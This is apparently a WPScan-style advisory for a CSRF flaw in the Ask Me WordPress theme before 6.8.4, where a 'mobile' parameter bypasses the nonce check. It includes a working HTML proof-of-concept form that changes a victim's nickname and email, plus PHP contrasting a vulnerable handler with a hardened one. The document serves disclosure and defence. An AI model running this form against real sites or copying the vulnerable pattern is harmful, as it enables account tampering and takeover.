Ask Me < 6.8.4 - CSRF in Edit Profile
Description
The theme does not perform nonce checks when processing POST requests to the Edit Profile page, allowing an attacker to trick a user into changing their profile information by getting them to submit a crafted request.
Version 6.8.2 introduced nonce checks, but they are bypassed when the 'mobile' parameter is also passed.
Proof of Concept
<html>
  <body>
    <form action="https://example.com/edit-profile/" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="nickname" value="Evil Ottar" />
      <input type="hidden" name="email" value="dr.evil@example.com" />
      <input type="hidden" name="user_action" value="edit_profile" />
      <!-- Version 6.8.2 introduces a nonce, but checking it is bypassed if 'mobile' is not empty. -->
      <input type="hidden" name="mobile" value="1" />
      <input type="submit" value="Save" />
    </form>
  </body>
</html>
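For comparison, the following is an added illustration of the bug class described above, not the theme's own code: a handler that only verifies the nonce on the branch where 'mobile' is empty, next to a hardened handler that verifies the nonce and the user's capability unconditionally. Function names, the nonce action and field names are assumptions.

```php
<?php
// Added illustration, not Ask Me's actual code: handler structure, nonce
// action and field names are assumptions modelled on the advisory text.

// Vulnerable pattern: the nonce check sits inside a branch, so a cross-site
// form that sets 'mobile' reaches the update without any nonce at all.
function askme_demo_edit_profile_vulnerable() {
    if ( ! is_user_logged_in() || empty( $_POST['user_action'] ) || 'edit_profile' !== $_POST['user_action'] ) {
        return;
    }
    if ( empty( $_POST['mobile'] ) ) {
        // Nonce check only on this branch; the 'mobile' branch is unprotected.
        check_admin_referer( 'askme_edit_profile', 'askme_nonce' );
    }
    askme_demo_update_profile( get_current_user_id(), $_POST );
}

// Hardened pattern: verify the nonce and capability before branching on any
// request parameter. The form emits the nonce with
// wp_nonce_field( 'askme_edit_profile', 'askme_nonce' ).
function askme_demo_edit_profile_fixed() {
    if ( ! is_user_logged_in() || empty( $_POST['user_action'] ) || 'edit_profile' !== $_POST['user_action'] ) {
        return;
    }
    $nonce = isset( $_POST['askme_nonce'] ) ? sanitize_text_field( wp_unslash( $_POST['askme_nonce'] ) ) : '';
    if ( ! wp_verify_nonce( $nonce, 'askme_edit_profile' ) ) {
        wp_die( esc_html__( 'Security check failed.', 'askme-demo' ), '', array( 'response' => 403 ) );
    }
    $user_id = get_current_user_id();
    if ( ! current_user_can( 'edit_user', $user_id ) ) {
        wp_die( esc_html__( 'Insufficient permissions.', 'askme-demo' ), '', array( 'response' => 403 ) );
    }
    askme_demo_update_profile( $user_id, $_POST );
}

// Shared update routine: sanitise the two fields the PoC targets before
// handing them to WordPress.
function askme_demo_update_profile( $user_id, $data ) {
    $args = array( 'ID' => $user_id );
    if ( ! empty( $data['nickname'] ) ) {
        $args['nickname'] = sanitize_text_field( wp_unslash( $data['nickname'] ) );
    }
    if ( ! empty( $data['email'] ) && is_email( wp_unslash( $data['email'] ) ) ) {
        $args['user_email'] = sanitize_email( wp_unslash( $data['email'] ) );
    }
    return wp_update_user( $args );
}
```

In the hardened version the PoC form above fails at wp_verify_nonce() regardless of the 'mobile' value, because no request parameter can route around the check.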
Affects Themes
Fixed in 6.8.4
References
CVE
Classification
Type
CSRF
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
WPScan team
Submitter
Harald Eilertsen
Submitter website
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2022-08-01
Added
2022-08-01
Last Updated
2023-04-30